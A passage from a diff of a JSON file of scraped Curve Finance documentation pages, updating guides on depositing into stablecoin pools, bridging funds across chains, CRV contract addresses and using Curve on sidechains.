Documentation Table of contents Depositing into the Tri-Pool Depositing into the pool Confirming and staking Depositing into the tri pool Depositing into the Tri-Pool The Tri-Pool is a classic Curve pool and improved upon earlier offerings in many ways. Here are some of the major improvements this pool: A new rampable A parameter (like on BTC pools) which can adjust liquidity density without causing losses to the virtual price (and to LPs) Gas optimised Will be used as a base pool for meta pools (which would essentially allow some pools to seemingly trade against underlying base pools without diluting liquidity) By only having the three most liquid stable coins in crypto, this pool should grow to become the most liquid and offer the best prices This pool is expected to become the most liquid and the cheapest to interact with making it a good place to start for newcomers wanting to try Curve with small amounts of capital. Because this pool is likely to offer the best prices, it will also likely be one of the Curve pools getting the most volume. See how to deposit and stake into the 3Pool: https://www.youtube.com/watch?v=OsRrGij9Ou8 Depositing into the pool Visit the deposit page ( https://www.curve.fi/3pool/deposit ). You will need one or multiple stable coins to deposit. The Tri-Pool takes DAI, USDC and USDT. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the three different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool. If you don't want to add all your stable coins, just click the \"Use maximum amount of coins available\" checkbox and enter the number of coins you wish to deposit and click \"Deposit and Stake\". Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO. Boosting your CRV Rewards Last update: 2023-08-15 Back to top", + "title": "Despositing into the susd-pool", + "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-susd-pool/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into the susd-pool Table of contents Depositing into the pool Confirming and staking Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing into the pool Confirming and staking Home Liquidity Providers Depositing Despositing into the susd-pool If youre wanting to figure out Curve, please read the starter guide . After reading this, you should have an understanding of how Curve works, how it makes money for liquidity providers and its risks which is ideally what you want before providing liquidity. Understanding Curve v1 Curve Finance sUSD pool has quickly become the biggest pool thanks to its SNX incentives which guarantee continuous returns to liquidity providers. The sUSD pool was born out of a partnership between Curve and Synthetix who sought to help bring stability to their stablecoin sUSD. The pool is not a lending pool which means your main APY only comes from trading fees. The pool has sUSD, DAI, USDC and USDT. Unlike Y pool, the sUSD pool is quite cheap to deposit in making it a good choice if you want to try Curve with a small amount. The current rewards have no expiry date but can be adjusted by a vote from Synthetix governance. Depositing into the pool Visit the deposit page ( https://curve.fi/#/ethereum/pools/susd/deposit ). You will need one or multiple stablecoins to deposit. The sUSD pool takes DAI, USDC, USDT and sUSD. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool, resulting in no slippage occurrence. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stablecoins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV and SNX . This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. You can claim both those tokens from the minter gauge. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing into the y pool", - "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-y-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Depositing into the y pool Table of contents Depositing into the Y Pool (deprecated) Depositing into the pool Confirming and staking Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Depositing into the Y Pool (deprecated) Depositing into the pool Confirming and staking Depositing into the y pool Depositing into the Y Pool (deprecated) Warning The content of this page is deprecated but it was maintained here to preserve history. If youre wanting to figure out Curve, please read the starter guide at this address . After reading this, you should have an understanding of how Curve works, how it makes money for liquidity providers and its risks which is ideally what you want before providing liquidity. Curve Finance Y pool has long been one of the most popular pools on Curve Finance due to its strong returns from trading fees supplemented by iEarn which also lends your stablecoin in the background to the lending protocol with the best lending rates out of dYdX and AAVE. Y pool also receives CRV rewards since its launch in early August. Now you know how the Y pool makes money for liquidity providers and you're ready to start providing liquidity. Depositing into the pool Visit the deposit page ( https://www.curve.fi/iearn/deposit ). You will need one or multiple stablecoins to deposit. The Y pool takes DAI, USDC, USDT and TUSD. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus like seen on the screenshot above. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool. The \"Deposit wrapped\" option allows you to directly deposit Y tokens that have been previously wrapped (on yEarn Finance website). If you are depositing a normal stable coin, you can ignore this option. If you don't want to add all your stablecoins, just click the \"Use maximum amount of coins available\" checkbox and enter the number of coins you wish to deposit and click \"Deposit and Stake\" . You will then be prompted to confirm multiple transactions. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. You can claim them from the minter gauge. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards. Boosting your CRV Rewards Last update: 2023-08-15 Back to top", + "title": "Despositing into the tri-pool", + "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-the-tri-pool/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into the tri-pool Table of contents Depositing into the pool Confirming and staking Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing into the pool Confirming and staking Home Liquidity Providers Depositing Despositing into the tri-pool The Tri-Pool is a classic Curve pool and improved upon earlier offerings in many ways. Here are some of the major improvements this pool: A new rampable A parameter (like on BTC pools) which can adjust liquidity density without causing losses to the virtual price (and to LPs) Gas optimised Will be used as a base pool for meta pools (which would essentially allow some pools to seemingly trade against underlying base pools without diluting liquidity) By only having the three most liquid stable coins in crypto, this pool should grow to become the most liquid and offer the best prices This pool is expected to become the most liquid and the cheapest to interact with making it a good place to start for newcomers wanting to try Curve with small amounts of capital. Because this pool is likely to offer the best prices, it will also likely be one of the Curve pools getting the most volume. See how to deposit and stake into the 3Pool: https://www.youtube.com/watch?v=OsRrGij9Ou8 Depositing into the pool Visit the deposit page ( https://curve.fi/#/ethereum/pools/3pool/deposit ). You will need one or multiple stable coins to deposit. The Tri-Pool takes DAI, USDC and USDT. First, it's important to understand that you don't have to deposit all coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the three different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit all three coins in the same proportion they currently are in the pool, resulting in no slippage occurrence. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab. Otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2106,15 +2130,15 @@ { "title": "Bridging funds", "html_url": "https://resources.curve.fi/multichain/bridging-funds/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Bridging funds Table of contents Bridging Funds $CRV Cross-Chain Important Bridges Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Bridging Funds $CRV Cross-Chain Important Bridges Bridging funds Bridging Funds In order to use Curve on chains other than Ethereum, you will need to bridge funds to the sidechain. Curve operates on several chains, documented here: Understanding Multichain Bridges are not operated by Curve, so Curve cannot offer support for using bridges. The following issues may affect users of bridges, so make sure to do research and exercise caution. Liquidity issues: Sometimes bridges do not have enough liquidity to process transactions. Usually the bridge will wait to refill liquidity before it permits funds getting processed. Stuck funds: Occasionally funds will get moved off one chain, but fail to appear on the new chain in a timely manner. Sometimes this gets resolved by simply waiting. In extreme cases, you should contact the support channels for the bridge in question. Hacking: Cross-chain communication can be complex, and the bridge is $CRV Cross-Chain The Curve token can be bridged across some chains, but does not always have full functionality. Staking of $CRV for veCRV must be done on Ethereum. Rewards voting for cross-chain gauges occurs on Ethereum. Important Bridges Arbitrum: https://bridge.arbitrum.io/ Fantom: Spookyswap: https://spookyswap.finance/bridge Polygon: https://wallet.polygon.technology/bridge/ xDai xDai Bridge: https://bridge.xdaichain.com/ Omni Bridge: https://omni.xdaichain.com/bridge Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Bridging funds Table of contents $CRV Cross-Chain Important Bridges Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents $CRV Cross-Chain Important Bridges Home Multi-Chain Bridging funds In order to use Curve on chains other than Ethereum, you will need to bridge funds to the sidechain. Curve operates on several chains, documented here: Understanding Multichain Bridges are not operated by Curve, so Curve cannot offer support for using bridges. The following issues may affect users of bridges, so make sure to do research and exercise caution. Liquidity issues: Sometimes bridges do not have enough liquidity to process transactions. Usually the bridge will wait to refill liquidity before it permits funds getting processed. Stuck funds: Occasionally funds will get moved off one chain, but fail to appear on the new chain in a timely manner. Sometimes this gets resolved by simply waiting. In extreme cases, you should contact the support channels for the bridge in question. Hacking: Cross-chain communication can be complex, and the bridge is $CRV Cross-Chain The Curve token can be bridged across some chains, but does not always have full functionality. Staking of $CRV for veCRV must be done on Ethereum. Rewards voting for cross-chain gauges occurs on Ethereum. Important Bridges MULTICHAIN WARNING Multichain statement: https://twitter.com/MultichainOrg/status/1677180114227056641 The Multichain service stopped currently, and all bridge transactions will be stuck on the source chains. There is no confirmed resume time. Please dont use the Multichain bridging service now. Network Bridge CRV Contract Address Arbitrum https://bridge.arbitrum.io/ 0x11cDb42B0EB46D95f990BeDD4695A6e3fA034978 Base https://bridge.base.org/deposit 0x8Ee73c484A26e0A5df2Ee2a4960B789967dd0415 Optimism https://app.optimism.io/bridge 0x0994206dfE8De6Ec6920FF4D779B0d950605Fb53 Polygon https://wallet.polygon.technology/bridge/ 0x172370d5Cd63279eFa6d502DAB29171933a610AF xDai xDai Bridge: https://bridge.xdaichain.com/ 0x712b3d230F3C1c19db860d80619288b1F0BDd0Bd Omni Bridge https://omni.xdaichain.com/bridge 0x712b3d230F3C1c19db860d80619288b1F0BDd0Bd Avalanche Multichain: : https://multichain.org/ 0x47536F17F4fF30e64A96a7555826b8f9e66ec468 Fantom Multichain: : https://multichain.org/ 0x1E4F97b9f9F913c46F1632781732927B9019C68b Celo Multichain: : https://multichain.org/ 0x173fd7434B8B50dF08e3298f173487ebDB35FD14 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding multichain", + "title": "Understanding multi-chain", "html_url": "https://resources.curve.fi/multichain/understanding-multichain/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Understanding multichain Table of contents Understanding Multichain Connecting your Wallet Curve Forks Avalanche Arbitrum Binance Smart Chain Fantom Harmony Optimis Polygon xDai Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Multichain Connecting your Wallet Curve Forks Avalanche Arbitrum Binance Smart Chain Fantom Harmony Optimis Polygon xDai Understanding multichain Understanding Multichain Curve exists across several chains, with several more planned. Curve's primary chain will always be Ethereum, but other sidechains have advantages including speed and cost. In order to use Curve on other chains, you must typically send your funds from Ethereum to the sidechain using the chain's bridge. All of Curve's active chains can be found in the \"Networks\" menu on the Curve homepage. Supported Sidechains as of 11/14/2022 Connecting your Wallet When you move to new chains, you will need to connect your wallet with the chain's RPC and chain ID. Generally Curve sidechain pages have a button you can press to automatically switch networks and populate this information for you. A common issue with sidechains is RPC networks that are temporarily or permanently unavailable. If you are having trouble connecting with RPC networks you may need to visit the chain's support networks to find a new RPC network. Curve Forks Curve forks include the following: Avalanche Avalanche is a sidechain that bills itself as \"blazingly fast, low-cost and eco-friendly.\" Curve's Avalanche site is hosted at https://avax.curve.fi/ Arbitrum Arbitrum is an Optimistic Ethereum L2. Arbitrum validators optimistically assume nodes will be operating in good faith, which allows for faster transactions. However, to retroactively allow opportunity to challenge malicious behavior, settlement time can be slower. In some cases this could mean it takes up to one week to bridge funds off-chain, so plan accordingly. Useful Links: Curve: https://arbitrum.curve.fi/ Bridge: https://bridge.arbitrum.io/ Block Explorer: https://arbiscan.io/ Binance Smart Chain Curve does not operate on Binance Smart Chain. The team at Ellipsis ( https://ellipsis.finance/ ) launched a fork of Curve that provides similar functionality. The Curve team authorized this fork, but does not actively maintain this fund. Fantom Using Curve on Fantom Harmony Harmony is a proof-of-stake sidechain promising two seconds of transaction speed and a hundred times lower gas fee. Curve's Harmony offerings are at https://harmony.curve.fi/ Optimis Optimism is verified by a series of smart contracts on the Ethereum mainnet and thus not considered a real sidechain. Curve's Optimism branch is located at https://optimism.curve.fi/ Polygon Using Curve on Polygon xDai The xDai chain is a stable payments EVM (Ethereum Virtual Machine) blockchain designed for fast and inexpensive transactions. Useful Links: Curve : https://xdai.curve.fi/ Bridges: xDai Bridge: https://bridge.xdaichain.com/ Omni Bridge: https://omni.xdaichain.com/bridge Block Explorer: https://blockscout.com/xdai/mainnet/ Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Understanding multi-chain Table of contents Connecting your Wallet Curve Forks Avalanche Arbitrum Binance Smart Chain Fantom Harmony Optimism Polygon xDai/Gnosis Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Connecting your Wallet Curve Forks Avalanche Arbitrum Binance Smart Chain Fantom Harmony Optimism Polygon xDai/Gnosis Home Multi-Chain Understanding multi-chain Curve exists across several chains, with several more planned. Curve's primary chain will always be Ethereum, but other sidechains have advantages including speed and cost. In order to use Curve on other chains, you must typically send your funds from Ethereum to the sidechain using the chain's bridge. All of Curve's active chains can be found in the \"Networks\" menu on the Curve homepage. Supported Sidechains as of 11/14/2022 Connecting your Wallet When you move to new chains, you will need to connect your wallet with the chain's RPC and chain ID. Generally Curve sidechain pages have a button you can press to automatically switch networks and populate this information for you. A common issue with sidechains is RPC networks that are temporarily or permanently unavailable. If you are having trouble connecting with RPC networks you may need to visit the chain's support networks to find a new RPC network. Curve Forks Tip For Bridges and CRV contract addresses on other chains please see Important Bridges . Curve forks include the following: Avalanche Avalanche is a sidechain that bills itself as \"blazingly fast, low-cost and eco-friendly.\" Curve's Avalanche site is hosted at https://avax.curve.fi/ Arbitrum Arbitrum is an Optimistic Ethereum L2. Arbitrum validators optimistically assume nodes will be operating in good faith, which allows for faster transactions. However, to retroactively allow opportunity to challenge malicious behavior, settlement time can be slower. In some cases this could mean it takes up to one week to bridge funds off-chain, so plan accordingly. Curve on Arbitrum: https://curve.fi/#/arbitrum/pools Binance Smart Chain Curve does not operate on Binance Smart Chain. The team at Ellipsis ( https://ellipsis.finance/ ) launched a fork of Curve that provides similar functionality. The Curve team authorized this fork, but does not actively maintain this fund. Fantom Fantom is a high-performance, scalable, and secure smart contract platform designed to overcome the limitations of traditional blockchain networks by utilizing a DAG-based consensus algorithm. Curve on Fantom: https://curve.fi/#/fantom/pools Harmony Harmony is a proof-of-stake sidechain promising two seconds of transaction speed and a hundred times lower gas fee. Curve's Harmony offerings are at https://harmony.curve.fi/ . Optimism Optimism is verified by a series of smart contracts on the Ethereum mainnet and thus not considered a real sidechain. Curve's Optimism branch is located at https://curve.fi/#/optimism/pools Polygon Polygon (previously known as Matic Network) is a multi-chain scaling solution for Ethereum that aims to provide faster and cheaper transactions using Layer 2 sidechains. Curve on Polygon: https://curve.fi/#/polygon/pools xDai/Gnosis The xDai chain is a stable payments EVM (Ethereum Virtual Machine) blockchain designed for fast and inexpensive transactions. Curve on xDai/Gnosis: https://curve.fi/#/xdai/pools 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2122,7 +2146,7 @@ { "title": "Using curve on fantom", "html_url": "https://resources.curve.fi/multichain/using-curve-on-fantom/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on fantom Table of contents Using Curve on Fantom Changing your MetaMask network Acquiring FTM Head to Curve Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Using Curve on Fantom Changing your MetaMask network Acquiring FTM Head to Curve Using curve on fantom Using Curve on Fantom Changing your MetaMask network Fantom is an EVM-compatible chain meaning it can easily run with MetaMask. The first step of this tutorial is to set up a different the Fantom network on Metamask. Click on Settings and Networks and add. Fill details as below: RPC: https://rpcapi.fantom.network Chain Id: 250 Symbol: FTM Explorer: https://ftmscan.com Acquiring FTM Now that you're set up in MetaMask, you can browse any Fantom dapps with ease. Each account on Ethereum also exists on Fantom which means you can use the same addresses without issues on Ethereum and Fantom. Please note Fantom does not yet support MetaMask via Ledger. To get started you'll need to get Fantom native currency FTM, you can acquire it on SushiSwap or most centralised exchanges. For the latter, you can transfer directly to your Fantom address via the Fantom blockchain. If you purchase FTM on the Ethereum blockchain, you can cross to Fantom using bridges. This will let you transfer FTM from Ethereum to Fantom and start transacting. Head to Curve Once that's done you can also bridge USDC/DAI and deposit and swap on Curve Fantom website making sure you're connected to the Fantom network in your MetaMask settings: Curve.fi Experience Curve like it's January 2020 Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Using Curve on Fantom Changing your MetaMask network Acquiring FTM Head to Curve Using curve on fantom Using Curve on Fantom Changing your MetaMask network Fantom is an EVM-compatible chain meaning it can easily run with MetaMask. The first step of this tutorial is to set up a different the Fantom network on Metamask. Click on Settings and Networks and add. Fill details as below: RPC: https://rpcapi.fantom.network Chain Id: 250 Symbol: FTM Explorer: https://ftmscan.com Acquiring FTM Now that you're set up in MetaMask, you can browse any Fantom dapps with ease. Each account on Ethereum also exists on Fantom which means you can use the same addresses without issues on Ethereum and Fantom. Please note Fantom does not yet support MetaMask via Ledger. To get started you'll need to get Fantom native currency FTM, you can acquire it on SushiSwap or most centralised exchanges. For the latter, you can transfer directly to your Fantom address via the Fantom blockchain. If you purchase FTM on the Ethereum blockchain, you can cross to Fantom using bridges. This will let you transfer FTM from Ethereum to Fantom and start transacting. Head to Curve Once that's done you can also bridge USDC/DAI and deposit and swap on Curve Fantom website making sure you're connected to the Fantom network in your MetaMask settings: Curve.fi Experience Curve like it's January 2020 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2130,15 +2154,15 @@ { "title": "Using curve on polygon", "html_url": "https://resources.curve.fi/multichain/using-curve-on-polygon/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing 